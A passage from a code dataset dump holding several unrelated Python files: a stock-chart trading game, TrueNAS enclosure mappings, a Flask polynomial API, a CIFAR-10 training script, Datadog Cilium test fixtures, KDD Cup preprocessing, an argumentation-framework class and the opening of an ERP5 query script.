df=self.d_df[\"df\"]\n df=df.tail(240)\n self.draw_normal(df=df)\n\n def drawalltime(self):\n #display last 20 days\n df=self.d_df[\"df\"]\n self.draw_normal(df=df)\n\n def draw_result(self):\n print(\"draw_result\")\n # clearing old figure\n self.figure.clear()\n\n # get the result with 60 days in the future\n df=self.d_df[\"df_master\"]\n number=self.d_df[\"number\"]\n df_old=self.d_df[\"df\"]\n\n df=df.head(number+20)\n trade_date=df.index[number]\n trade_datem=df.index[number-1]\n trade_datep=df.index[number+1]\n\n\n self.d_df[\"number\"]=newnum=self.d_df[\"number\"]+20\n self.d_df[\"df\"]=self.d_df[\"df_master\"].head(newnum)\n\n\n for col in [\"trade\",\"tradevol\"]:\n helper=\"close\" if col==\"trade\" else \"turnover_rate\"\n df.at[trade_date,col]=self.d_df[\"df_master\"].at[trade_date,col]=df_old[helper].max()\n df.at[trade_datem,col]=self.d_df[\"df_master\"].at[trade_date,col]=df_old[helper].min()\n df.at[trade_datep,col]=self.d_df[\"df_master\"].at[trade_datep,col]=df_old[helper].min()\n\n df = df.reset_index()\n self.draw_normal(df=df,a_col1=[\"close\",\"trade\"],a_col2=[\"turnover_rate\",\"tradevol\"])\n\n\n def draw_normal(self,df,a_col1=[\"close\",\"trade\"],a_col2=[\"turnover_rate\",\"tradevol\"]):\n df = df.reset_index()\n # clearing old figure\n self.figure.clear()\n\n # create an axis\n ax = self.figure.add_subplot(211)\n # plot data\n for col in a_col1:\n ax.plot(df[col])\n ax2 = self.figure.add_subplot(212)\n # plot data\n for col in a_col2:\n ax2.plot(df[col])\n\n # refresh canvas\n self.canvas.draw()\n\n\n def prepare_continue_trade_check(self):\n df_master=self.d_df[\"df_master\"]\n number=self.d_df[\"number\"]\n if False:\n # continue, can be further traded\n self.buy.setEnabled(True)\n self.sell.setEnabled(True)\n else:\n self.buy.setEnabled(False)\n self.sell.setEnabled(False)\n\n\n\n def long(self):\n self.played += 1\n if self.reveal_fgain20> 1:\n self.won+=1\n self.port = self.port * self.reveal_fgain20\n self.message.setText(f\"{self.name}: Your Long is correct! Fgain is {self.reveal_fgain20} in next 60 days\")\n else:\n self.port = self.port * self.reveal_fgain20\n self.message.setText(f\"{self.name}: Your Long is wrong! 
Fgain is {self.reveal_fgain20} in next 60 days\")\n\n df_master = self.d_df[\"df_master\"]\n number = self.d_df[\"number\"]\n df_result = df_master.iloc[number:number + 20]\n pgain = df_result[\"close\"].iat[-1] / df_result[\"close\"].iat[0]\n\n self.reveal_fgain20 = np.round(pgain, 2)\n self.label.setText(f\"{self.played} traded\\n{self.won} traded won\\n{self.skipped} skipped\\nCash {self.port}\")\n\n\n self.draw_result()\n self.prepare_continue_trade_check()\n\n\n\n\n def short(self):\n self.played += 1\n if self.reveal_fgain20 < 1:#correct bet\n self.won += 1\n self.port = self.port * (1 + (1 - self.reveal_fgain20))\n self.message.setText(f\"{self.name}: Your Short is correct! Fgain is {self.reveal_fgain20} in next 60 days\")\n else:#false bet. stock gained\n self.port = self.port * (1 - (self.reveal_fgain20 - 1))\n self.message.setText(f\"{self.name}: Your Short is wrong! Fgain is {self.reveal_fgain20} in next 60 days\")\n\n df_master=self.d_df[\"df_master\"]\n number=self.d_df[\"number\"]\n df_result = df_master.iloc[number:number + 20]\n pgain = df_result[\"close\"].iat[-1] / df_result[\"close\"].iat[0]\n self.reveal_fgain20 = np.round(pgain, 2)\n self.label.setText(f\"{self.played} traded\\n{self.won} traded won\\n{self.skipped} skipped\\nCash {self.port}\")\n\n\n self.draw_result()\n self.prepare_continue_trade_check()\n\n\n def showresult(self):\n self.message.setText(f\"{self.name}: Fgain would be {self.reveal_fgain20} \")\n df_master=self.d_df[\"df_master\"]\n number=self.d_df[\"number\"]\n df_result = df_master.iloc[number:number + 20]\n pgain = df_result[\"close\"].iat[-1] / df_result[\"close\"].iat[0]\n self.reveal_fgain20 = np.round(pgain, 2)\n self.label.setText(f\"{self.played} traded\\n{self.won} traded won\\n{self.skipped} skipped\\nCash {self.port}\")\n self.draw_result()\n self.prepare_continue_trade_check()\n\n\n def generate_chart(self):\n if self.buy.isEnabled() and self.sell.isEnabled():\n self.skipped += 1\n self.label.setText(f\"{self.played} traded\\n{self.won} traded won\\n{self.skipped} skipped\\nCash {self.port}\")\n self.message.setText(f\"\")\n\n df_ts_code = DB.get_ts_code(a_asset=[\"E\"])\n for _ in range(0, 1000):\n try:\n df_random = df_ts_code.sample(1)\n ts_code = df_random.index[0]\n name=df_ts_code.at[ts_code,\"name\"]\n df_master = DB.get_asset(ts_code=ts_code)\n if len(df_master)<500:\n continue\n\n self.ts_code=ts_code\n self.name=name\n df_master[\"trade\"]=np.nan\n df_master[\"tradevol\"]=np.nan\n\n\n number = random.randint(250, len(df_master)-20)\n df=df_master.head(number)\n\n #the real result\n df_result=df_master.iloc[number:number+20]\n pgain=df_result[\"close\"].iat[-1]/df_result[\"close\"].iat[0]\n\n self.reveal_fgain20 =np.round(pgain, 2)\n\n self.d_df={\"df_master\":df_master,#original\n \"number\": number,#cuted\n \"df\": df} # displayed\n break\n except:\n pass\n\n self.draw_normal(df=df)\n self.buy.setEnabled(True)\n self.sell.setEnabled(True)\n\n\n\n# driver code\nif __name__ == '__main__':\n # creating apyqt5 application\n\n app = QApplication(sys.argv)\n main = Window()\n main.show()\n sys.exit(app.exec_())","sub_path":"TechTest.py","file_name":"TechTest.py","file_ext":"py","file_size_in_byte":9572,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"280449068","text":"from collections import namedtuple\nimport re\n\nfrom middlewared.service import Service, private\n\nProductMapping = namedtuple(\"ProductMapping\", [\"product_re\", \"mappings\"])\nVersionMapping = 
namedtuple(\"VersionMapping\", [\"version_re\", \"slots\"])\nMappingSlot = namedtuple(\"MappingSlot\", [\"num\", \"slot\", \"identify\"])\n\n\nMAPPINGS = [\n ProductMapping(re.compile(r\"FREENAS-MINI-3.0-E\\+?$\"), [\n VersionMapping(re.compile(\".*\"), [\n MappingSlot(0, 0, False),\n MappingSlot(0, 1, False),\n MappingSlot(0, 2, False),\n MappingSlot(0, 3, False),\n MappingSlot(0, 5, False),\n MappingSlot(0, 4, False),\n ]),\n ]),\n ProductMapping(re.compile(r\"FREENAS-MINI-3.0-X$\"), [\n VersionMapping(re.compile(\".*\"), [\n MappingSlot(0, 0, False),\n MappingSlot(0, 1, False),\n MappingSlot(0, 2, False),\n MappingSlot(0, 3, False),\n MappingSlot(1, 0, False),\n MappingSlot(1, 1, False),\n MappingSlot(1, 3, False),\n ]),\n ]),\n ProductMapping(re.compile(r\"FREENAS-MINI-3.0-X\\+$\"), [\n VersionMapping(re.compile(\".*\"), [\n MappingSlot(0, 0, False),\n MappingSlot(0, 1, False),\n MappingSlot(0, 2, False),\n MappingSlot(0, 3, False),\n MappingSlot(0, 4, False),\n MappingSlot(0, 5, False),\n MappingSlot(0, 6, False),\n ]),\n ]),\n ProductMapping(re.compile(r\"FREENAS-MINI-3.0-XL\\+$\"), [\n VersionMapping(re.compile(\".*\"), [\n MappingSlot(1, 4, False),\n MappingSlot(0, 0, False),\n MappingSlot(0, 1, False),\n MappingSlot(0, 2, False),\n MappingSlot(0, 3, False),\n MappingSlot(0, 4, False),\n MappingSlot(0, 5, False),\n MappingSlot(0, 6, False),\n MappingSlot(0, 7, False),\n MappingSlot(1, 3, False),\n ]),\n ]),\n]\n\n\nclass EnclosureService(Service):\n @private\n async def map_enclosures(self, enclosures):\n info = await self.middleware.call(\"system.info\")\n for product_mapping in MAPPINGS:\n if product_mapping.product_re.match(info[\"system_product\"]):\n for version_mapping in product_mapping.mappings:\n if version_mapping.version_re.match(info[\"system_product_version\"]):\n return await self._map_enclosures(enclosures, version_mapping.slots)\n\n return enclosures\n\n async def _map_enclosures(self, enclosures, slots):\n elements = []\n has_slot_status = False\n for slot, mapping in enumerate(slots, 1):\n try:\n original_enclosure = enclosures[mapping.num]\n except IndexError:\n self.logger.error(\"Mapping referenced enclosure %d but it is not present on this system\",\n mapping.num)\n return []\n\n original_slots = list(filter(lambda element: element[\"name\"] == \"Array Device Slot\",\n original_enclosure[\"elements\"]))[0][\"elements\"]\n\n try:\n original_slot = original_slots[mapping.slot]\n except IndexError:\n self.logger.error(\"Mapping referenced slot %d in enclosure %d but it is not present on this system\",\n mapping.slot, mapping.num)\n return []\n\n element = {\n \"slot\": slot,\n \"data\": dict(original_slot[\"data\"], **{\n \"Descriptor\": f\"Disk #{slot}\",\n }),\n \"name\": \"Array Device Slot\",\n \"descriptor\": f\"Disk #{slot}\",\n \"status\": original_slot[\"status\"],\n \"value\": original_slot[\"value\"],\n \"value_raw\": original_slot[\"value_raw\"],\n \"original\": {\n \"enclosure_id\": original_enclosure[\"id\"],\n \"slot\": original_slot[\"slot\"],\n },\n }\n if mapping.identify:\n has_slot_status = True\n for k in [\"fault\", \"identify\"]:\n if k in original_slot:\n element[k] = original_slot[k]\n else:\n self.logger.warning(\"Mapping referenced slot %d in enclosure %d as identifiable but key %r \"\n \"is not present on this system\", mapping.slot, mapping.num, k)\n has_slot_status = False\n\n elements.append(element)\n\n info = await self.middleware.call(\"system.info\")\n return [\n {\n \"id\": \"mapped_enclosure_0\",\n \"name\": \"Drive Bays\",\n 
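# this synthesized enclosure is returned in place of the raw SES enclosures for the FREENAS-MINI platforms matched above\n 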
\"controller\": True,\n \"label\": \"Drive Bays\",\n \"elements\": [\n {\n \"name\": \"Array Device Slot\",\n \"descriptor\": \"Drive Slots\",\n \"header\": [\"Descriptor\", \"Status\", \"Value\", \"Device\"],\n \"elements\": elements,\n \"has_slot_status\": has_slot_status,\n },\n ],\n }\n ]\n","sub_path":"src/freenas/usr/local/lib/middlewared_truenas/plugins/enclosure_/map.py","file_name":"map.py","file_ext":"py","file_size_in_byte":5310,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"287974024","text":"from flask import Flask\nfrom flask_restful import Resource, Api\nimport numpy as np \nimport random\nimport re\n\napp = Flask(__name__)\napi = Api(app)\n\nclass findPolynomial(Resource):\n def get(self, p, degree):\n ''' find a polynomial of degree n determined by n+1 of its points \n form: y = a0 + a1x + a2x^2 + ... + anx^n\n '''\n nums = re.findall(re.compile(r'[\\d]*'),p)\n points1 = []\n for x in nums:\n if x != '':\n points1.append(x)\n points = []\n for y in range(len(points1)):\n if (y % 2) == 0:\n points.append((int(points1[y]),int(points1[y+1])))\n else:\n continue\n if len(points) < (degree + 1):\n return \"Not Enough Points to Determine Polynomial\"\n else:\n # build the Vandermonde system A * coeffs = b from the given points\n A = np.empty([degree+1,degree+1])\n b = np.empty([degree+1,1])\n for y in range(degree+1):\n for j in range(degree+1):\n A[y][j] = points[y][0]**j\n b[y] = points[y][1]\n try:\n solution = np.linalg.solve(A,b)\n text = str(int(round(solution[0][0]))) + ' + '\n for n in range(1, len(solution)):\n text += str(int(round(solution[n][0]))) + 'x^' + str(n)\n if n < len(solution) - 1:\n text += ' + '\n return text\n except:\n return \"Invalid Points\"\n\nclass makePoints(Resource):\n def get(self, c, number):\n ''' Given coefficients a0, a1, a2, ..., returns points for a polynomial of the form:\n y = a0 + a1x + a2x^2 + ... + anx^n\n up to 100 points\n up to 5th degree polynomial\n '''\n coefficients = []\n nums = re.findall(re.compile(r'[\\d]*'),c)\n print(nums)\n for x in nums:\n if x !='':\n coefficients.append(int(x))\n if (len(coefficients) > 6):\n return \"More than 5th degree polynomial\"\n elif (number > 100):\n return \"More than 100 points\"\n else:\n X = random.sample(range(100), number)\n points = []\n for x in X:\n sum = 0\n for a in range(len(coefficients)):\n sum += coefficients[a]*(x**a)\n points.append((x,sum))\n return str(points)\n\n\napi.add_resource(findPolynomial, '/findPolynomial/<string:p>/<int:degree>')\napi.add_resource(makePoints, '/makePoints/<string:c>/<int:number>')\n\n\nif __name__ == '__main__':\n # app.run(debug=True)\n app.run()\n\n","sub_path":"api/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":2636,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"123866851","text":"\"\"\"Use this to complete part 2\n\n Usage:\n $ python mlp_relu.py\n\n Trains a three layer neural network using the relu function as the\n activation function. Trains on four different learning rates\n (0.1, 0.01, 0.001, 0.0001) and plots the results. 
Finally,\n performs a classifier test on the testing data set from CIFAR10\n and prints the results.\n\n\"\"\"\n\nimport mlp\n#import matplotlib.pyplot as plt\n\nEPOCHS = 100\n\nif __name__ == '__main__':\n train_loader = mlp.get_cifar10_data(train=True)\n validation_loader = mlp.get_cifar10_data(train=False)\n test_loader = mlp.get_cifar10_test_data()\n\n # training and validation\n train_loss1, accv1, model1 = mlp.relu_NN_train_and_val(train_loader, validation_loader, \n lr=0.1, epochs=EPOCHS)\n train_loss2, accv2, model2 = mlp.relu_NN_train_and_val(train_loader, validation_loader, \n lr=0.01, epochs=EPOCHS)\n train_loss3, accv3, model3 = mlp.relu_NN_train_and_val(train_loader, validation_loader, \n lr=0.001, epochs=EPOCHS)\n train_loss4, accv4, model4 = mlp.relu_NN_train_and_val(train_loader, validation_loader, \n lr=0.0001, epochs=EPOCHS)\n\n epochs = range(1, EPOCHS + 1)\n\n # Training loss plot\n #plt.figure(1)\n #plt.plot(epochs, train_loss1, '-b', label='lr=0.1')\n #plt.plot(epochs, train_loss2, '-r', label='lr=0.01')\n #plt.plot(epochs, train_loss3, '-g', label='lr=0.001')\n #plt.plot(epochs, train_loss4, '-p', label='lr=0.0001')\n #plt.legend(loc='lower right')\n #plt.xlabel('Number of epochs')\n #plt.ylabel('Average loss')\n #plt.title('Negative Log Loss on Training Data as a Function of Epochs')\n #plt.savefig(\"relu_training_loss.png\")\n #print 'Plot saved as \"relu_training_loss.png\"'\n\n # Validation accuracy plot\n #plt.figure(2)\n #plt.plot(epochs, accv1, '-b', label='lr=0.1')\n #plt.plot(epochs, accv2, '-r', label='lr=0.01')\n #plt.plot(epochs, accv3, '-g', label='lr=0.001')\n #plt.plot(epochs, accv4, '-p', label='lr=0.0001')\n #plt.legend(loc='lower right')\n #plt.xlabel('Number of epochs')\n #plt.ylabel('Accuracy')\n #plt.title('Classifier Accuracy on Validation Data as a Function of Epochs')\n #plt.savefig(\"relu_accuracy.png\")\n #print 'Plot saved as \"relu_accuracy.png\"'\n\n # Determine which model is best and then perform validation on test data\n modelv = [model1, model2, model3, model4]\n model_accuracy = [accv1[EPOCHS-1], accv2[EPOCHS-1], accv3[EPOCHS-1], accv4[EPOCHS-1]]\n \n model_index = model_accuracy.index(max(model_accuracy))\n best_model = modelv[model_index]\n print(\"\\nBest model -- Learning rate of %f\" % (10**(-1*(model_index + 1))))\n\n print(\"Results of validation on testing set:\")\n lossv, accv = [], []\n mlp.validate(lossv, accv, best_model, test_loader)\n \n","sub_path":"src/assignment_3/mlp_relu.py","file_name":"mlp_relu.py","file_ext":"py","file_size_in_byte":2987,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"390158663","text":"# (C) Datadog, Inc. 
2019\n# All rights reserved\n# Licensed under a 3-clause BSD style license (see LICENSE)\nimport os\n\nimport mock\nimport pytest\n\nfrom datadog_checks.dev.kube_port_forward import port_forward\nfrom datadog_checks.dev.terraform import terraform_run\nfrom datadog_checks.utils.common import get_docker_hostname\n\nfrom .common import ADDL_AGENT_METRICS, AGENT_DEFAULT_METRICS, OPERATOR_AWS_METRICS, OPERATOR_METRICS\n\ntry:\n from contextlib import ExitStack\nexcept ImportError:\n from contextlib2 import ExitStack\n\nHERE = os.path.dirname(os.path.abspath(__file__))\nHOST = get_docker_hostname()\nAGENT_PORT = 9090\nOPERATOR_PORT = 6942\nAGENT_URL = \"http://{}:{}/metrics\".format(HOST, AGENT_PORT)\nOPERATOR_URL = \"http://{}:{}/metrics\".format(HOST, OPERATOR_PORT)\n\nPORTS = [AGENT_PORT, OPERATOR_PORT]\n\n\n@pytest.fixture(scope='session')\ndef dd_environment():\n with terraform_run(os.path.join(HERE, 'terraform')) as outputs:\n kubeconfig = outputs['kubeconfig']['value']\n with ExitStack() as stack:\n ip_ports = [\n stack.enter_context(port_forward(kubeconfig, 'cilium', 'cilium-operator', port)) for port in PORTS\n ]\n\n instances = {\n 'instances': [\n {\n 'agent_endpoint': 'http://{}:{}/metrics'.format(*ip_ports[0]),\n 'metrics': ADDL_AGENT_METRICS + AGENT_DEFAULT_METRICS,\n },\n {\n 'operator_endpoint': 'http://{}:{}/metrics'.format(*ip_ports[1]),\n 'metrics': OPERATOR_METRICS + OPERATOR_AWS_METRICS,\n },\n ]\n }\n\n yield instances\n\n\n@pytest.fixture(scope=\"session\")\ndef agent_instance():\n return {'agent_endpoint': AGENT_URL, 'tags': ['pod_test']}\n\n\n@pytest.fixture\ndef operator_instance():\n return {'operator_endpoint': OPERATOR_URL, 'tags': ['operator_test']}\n\n\n@pytest.fixture()\ndef mock_agent_data():\n f_name = os.path.join(os.path.dirname(__file__), 'fixtures', 'agent_metrics.txt')\n with open(f_name, 'r') as f:\n text_data = f.read()\n with mock.patch(\n 'requests.get',\n return_value=mock.MagicMock(\n status_code=200, iter_lines=lambda **kwargs: text_data.split(\"\\n\"), headers={'Content-Type': \"text/plain\"}\n ),\n ):\n yield\n\n\n@pytest.fixture()\ndef mock_operator_data():\n f_name = os.path.join(os.path.dirname(__file__), 'fixtures', 'operator_metrics.txt')\n with open(f_name, 'r') as f:\n text_data = f.read()\n with mock.patch(\n 'requests.get',\n return_value=mock.MagicMock(\n status_code=200, iter_lines=lambda **kwargs: text_data.split(\"\\n\"), headers={'Content-Type': \"text/plain\"}\n ),\n ):\n yield\n","sub_path":"cilium/tests/conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":2806,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"364101846","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nimport pandas as pd\nfrom sklearn.compose import make_column_transformer\nfrom sklearn.preprocessing import MinMaxScaler, OneHotEncoder\n\nkddcup_names = open(\"../datastore/kddcup.names\").read().split('\\n')\nfeatures = []\nfor feature in kddcup_names[1:]:\n features.append(feature.split(':')[0].strip())\n\nfeatures.append(\"connection_type\")\n\n# data = pd.read_csv('../datastore/kddcup.data.csv', skiprows=0, nrows=494021)\n# data = data.drop(\"label\", axis=1)\n# data.to_csv(\"../datastore/kddcup.data_demo_0.csv\", index=False, header=None)\n# data = pd.read_csv(\"../datastore/kddcup.data_demo_0.csv\", names=features, index_col=False, header=None)\n# data.to_csv(\"../datastore/kddcup.data_demo_0.csv\", index=False)\n# data=pd.read_csv(\"../datastore/kddcup.data_demo.csv\")\ndata = 
pd.read_csv(\"../datastore/kddcup.data_10_percent_with_header.csv\")\n\nprint(data)\n\n\ndef one_hot_encoder(data, features):\n \"\"\"\n one hot encoding text values to dummy variables\n\n :param data:\n :param features:\n :return:\n \"\"\"\n for feature in features:\n dummies = pd.get_dummies(data[feature])\n for x in dummies.columns:\n dummy_feature = f\"{feature}-{x}\"\n data[dummy_feature] = dummies[x]\n data.drop(feature, axis=1, inplace=True)\n\n\ndef zscore_numeric_encoder(data, features, mean=None, sd=None):\n \"\"\"\n Encode numerical columns as z-scores\n\n :param data:\n :param features:\n :param mean:\n :param sd:\n :return:\n \"\"\"\n for feature in features:\n if mean is None:\n mean = data[feature].mean()\n\n if sd is None:\n sd = data[feature].std()\n\n data[feature] = (data[feature] - mean) / sd\n\n\ntransformer = make_column_transformer(\n\n (MinMaxScaler(),\n ['duration', 'src_bytes', 'dst_bytes', 'wrong_fragment', 'urgent',\n 'hot', 'num_failed_logins', 'num_compromised', 'root_shell',\n 'su_attempted',\n 'num_root', 'num_file_creations', 'num_shells', 'num_access_files',\n 'num_outbound_cmds',\n 'count', 'srv_count', 'serror_rate', 'srv_serror_rate', 'rerror_rate',\n 'srv_rerror_rate',\n 'same_srv_rate', 'diff_srv_rate', 'srv_diff_host_rate', 'dst_host_count',\n 'dst_host_srv_count',\n 'dst_host_same_srv_rate', 'dst_host_diff_srv_rate',\n 'dst_host_same_src_port_rate',\n 'dst_host_srv_diff_host_rate',\n 'dst_host_serror_rate', 'dst_host_srv_serror_rate',\n 'dst_host_rerror_rate',\n 'dst_host_srv_rerror_rate'\n ]\n ),\n\n (OneHotEncoder(handle_unknown=\"ignore\"),\n ['protocol_type', 'service', 'flag', 'land', 'logged_in', 'is_host_login', 'is_guest_login'])\n\n)\n\ntransformer.fit(data)\ntransformer.transform(data)\n\n# def transform_data(data):\n# categorical_features = ['protocol_type', 'service', 'flag', 'land', 'logged_in', 'is_host_login', 'is_guest_login']\n#\n# one_hot_encoder(data, categorical_features)\n# non_categorical_features = ['duration', 'src_bytes', 'dst_bytes', 'wrong_fragment', 'urgent',\n# 'hot', 'num_failed_logins', 'num_compromised', 'root_shell', 'su_attempted',\n# 'num_root', 'num_file_creations', 'num_shells', 'num_access_files', 'num_outbound_cmds',\n# 'count', 'srv_count', 'serror_rate', 'srv_serror_rate', 'rerror_rate',\n# 'srv_rerror_rate',\n# 'same_srv_rate', 'diff_srv_rate', 'srv_diff_host_rate', 'dst_host_count',\n# 'dst_host_srv_count',\n# 'dst_host_same_srv_rate', 'dst_host_diff_srv_rate', 'dst_host_same_src_port_rate',\n# 'dst_host_srv_diff_host_rate',\n# 'dst_host_serror_rate', 'dst_host_srv_serror_rate', 'dst_host_rerror_rate',\n# 'dst_host_srv_rerror_rate'\n# ]\n#\n# zscore_numeric_encoder(data, non_categorical_features)\n# print(data.head())\n#\n# return data\n\n\n# data = transform_data(data)\n\nprint(data)\n\n\n","sub_path":"source/data_generator.py","file_name":"data_generator.py","file_ext":"py","file_size_in_byte":4121,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"604340854","text":"\"\"\"\n Using operators with custom objects:\n in-place subtraction\n\"\"\"\n\n\nclass Vector2:\n def __init__(self, x, y):\n self.x = x\n self.y = y\n\n def __isub__(self, other):\n self.x -= other.x\n self.y -= other.y\n return self\n\n\npos01 = Vector2(3, 2)\npos02 = Vector2(1, 5)\nprint(id(pos01))\npos01 -= 
pos02\nprint(id(pos01))\nprint(pos01.__dict__)\n","sub_path":"fancy_month01/day11_fancy/day11_teacher/exercise03.py","file_name":"exercise03.py","file_ext":"py","file_size_in_byte":364,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"147160153","text":"\"\"\" The Control Argumentation Framework (CAF) class.\n\nThis class represent a CAF, which is a more complex variation of an AF.\nWhereas an AF was used to represent the knowledge of a single Agent,\na CAF represents what an Agent knows of the knowledge of another Agent.\n\nThe arguments are separated into fixed, uncertain and control arguments.\n* Fixed arguments are arguments that are certainly in the other Agent's\n knowledge.\n* Uncertain arguments are arguments that may possibly be in the other\n Agent's knowledge.\n* Control arguments are arguments that can be used against fixed or\n uncertain arguments that attack arguments that are in favor of some of\n the Agent's offers.\n\nSimilarly, the attacks are separated into fixed, uncertain directed,\ncertain undirected, and control attacks.\n* Fixed attacks are attacks that are certainly in the other Agent's\n knowledge.\n* Uncertain directed attacks are attacks that may be in the other\n Agent's knowledge.\n* Certain undirected attacks are attacks that are in the other Agent's\n knowledge, but the direction is not known.\n* Control attacks are attacks from control arguments.\n\nLike in the AF, the CAF indicates which (practical) arguments support\nwhich offers (in the theory of one Agent about the knowledge of\nanother).\n\"\"\"\n\nfrom pydot import Dot, Node, Edge\nimport config as cf\n\n\nclass CAF():\n \"\"\"docstring for Control Argumentation Frameworks\"\"\"\n def __init__(self, arg_f=None, arg_u=None, arg_c=None,\n att_f=None, att_u=None, att_b=None, att_c=None,\n supp_args=None):\n self.arg_f = set() if arg_f is None else arg_f # fixed arguments\n self.arg_u = set() if arg_u is None else arg_u # uncertain arguments\n self.arg_c = set() if arg_c is None else arg_c # control arguments\n\n self.att_f = set() if att_f is None else att_f # fixed attacks\n self.att_u = set() if att_u is None else att_u # uncertain directed\n self.att_b = set() if att_b is None else att_b # certain undirected\n self.att_c = set() if att_c is None else att_c # control attacks\n\n self.supp_args = supp_args\n\n # Extend the set of fixed arguments by the set of arguments that\n # support offers.\n if supp_args:\n for arg in self.supp_args.values():\n self.arg_f |= arg\n\n def __repr__(self):\n \"\"\" How CAFs are represented when they are printed directly.\"\"\"\n return \"{}{}{}{}{}{}{}{}\".format(\n (f\"arg_f: {self.arg_f}, \" if self.arg_f else ''),\n (f\"arg_u: {self.arg_u}, \" if self.arg_u else ''),\n (f\"arg_c: {self.arg_c}, \" if self.arg_c else ''),\n (f\"att_f: {self.att_f}, \" if self.att_f else ''),\n (f\"att_u: {self.att_u}, \" if self.att_u else ''),\n (f\"att_b: {self.att_b}, \" if self.att_b else ''),\n (f\"att_c: {self.att_c}.\" if self.att_c else ''),\n (f\"supp_args: {self.supp_args}.\"))\n\n def visualize(self, filename):\n \"\"\"Save a graphical representation of this AF.\"\"\"\n graph = Dot(graph_type='digraph')\n\n for arg in self.arg_f: # Fixed arguments\n text = arg.text\n\n # Add any offers to the text that this argument may support\n for off, supp in self.supp_args.items():\n if arg in supp:\n text += f\"\\n[{off}]\"\n\n graph.add_node(Node(\n name=text, style=\"filled\", fillcolor=cf.COLOR_FIXED))\n\n for arg in self.arg_u: 
# Uncertain arguments\n graph.add_node(Node(\n name=arg.text, style=\"filled\", fillcolor=cf.COLOR_UNCERTAIN))\n\n for arg in self.arg_c: # Control arguments\n graph.add_node(Node(\n name=arg.text, style=\"filled\", fillcolor=cf.COLOR_CONTROL))\n\n for att in self.att_f: # Fixed attacks\n if att.arg_start in self.arg_f | self.arg_u and \\\n att.arg_end in self.arg_f | self.arg_u:\n texts = []\n\n for arg in [att.arg_start, att.arg_end]:\n texts.append(arg.text)\n\n for off, supp in self.supp_args.items():\n if arg in supp:\n texts[-1] += f\"\\n[{off}]\"\n graph.add_edge(Edge(texts[0],\n texts[1],\n color=cf.COLOR_FIXED,\n dirType=\"forward\"))\n else:\n print(\"Warning: attack in CAF but not its start or end\")\n\n for att in self.att_u: # Uncertain attacks\n if att.arg_start in self.arg_f | self.arg_u and \\\n att.arg_end in self.arg_f | self.arg_u:\n texts = []\n\n for arg in [att.arg_start, att.arg_end]:\n texts.append(arg.text)\n\n for off, supp in self.supp_args.items():\n if arg in supp:\n texts[-1] += f\"\\n[{off}]\"\n graph.add_edge(Edge(texts[0],\n texts[1],\n color=cf.COLOR_UNCERTAIN,\n dirType=\"both\",\n style=\"dashed\"))\n else:\n print(\"Warning: attack in CAF but not its start or end\")\n\n for att in self.att_b: # Bidirectional attacks\n if att.arg_start in self.arg_f | self.arg_u and \\\n att.arg_end in self.arg_f | self.arg_u:\n texts = []\n\n for arg in [att.arg_start, att.arg_end]:\n texts.append(arg.text)\n\n for off, supp in self.supp_args.items():\n if arg in supp:\n texts[-1] += f\"\\n[{off}]\"\n graph.add_edge(Edge(texts[0],\n texts[1],\n color=cf.COLOR_UNCERTAIN,\n dirType=\"forward\"))\n else:\n print(\"Warning: attack in CAF but not its start or end\")\n\n for att in self.att_c: # Control attacks\n if att.arg_start in self.arg_c and \\\n att.arg_end in self.arg_c | self.arg_f | self.arg_u:\n texts = []\n\n for arg in [att.arg_start, att.arg_end]:\n texts.append(arg.text)\n\n for off, supp in self.supp_args.items():\n if arg in supp:\n texts[-1] += f\"\\n[{off}]\"\n graph.add_edge(Edge(texts[0],\n texts[1],\n color=cf.COLOR_CONTROL,\n dirType=\"forward\"))\n else:\n print(\"Warning: attack in CAF but not its start or end\")\n\n graph.write_png(filename)\n","sub_path":"caf.py","file_name":"caf.py","file_ext":"py","file_size_in_byte":6889,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"636482483","text":"\n\nfrom xai.brain.wordbase.nouns._attribution import _ATTRIBUTION\n\n#class header\nclass _ATTRIBUTIONS(_ATTRIBUTION, ):\n\tdef __init__(self,): \n\t\t_ATTRIBUTION.__init__(self)\n\t\tself.name = \"ATTRIBUTIONS\"\n\t\tself.specie = 'nouns'\n\t\tself.basic = \"attribution\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/nouns/_attributions.py","file_name":"_attributions.py","file_ext":"py","file_size_in_byte":273,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"525396247","text":"\"\"\"\n Keep a custom script to permit rendering other types of documents, i.e.: Software Installation.\n\"\"\"\nfrom Products.ZSQLCatalog.SQLCatalog import ComplexQuery, SimpleQuery\n\nportal = context.getPortalObject()\n\nquery = ComplexQuery(\n ComplexQuery(\n SimpleQuery(portal_type=\"Support Request\"),\n SimpleQuery(default_aggregate_uid=context.getUid()),\n logical_operator='and'),\n ComplexQuery(\n SimpleQuery(portal_type=\"Upgrade Decision Line\"),\n SimpleQuery(default_aggregate_uid=context.getUid()),\n logical_operator='and'),\n logical_operator='or')\n\n# Use event modification date instead. 
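\n# suspended tickets sort first, then validated, then confirmed; newest modification first within each state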
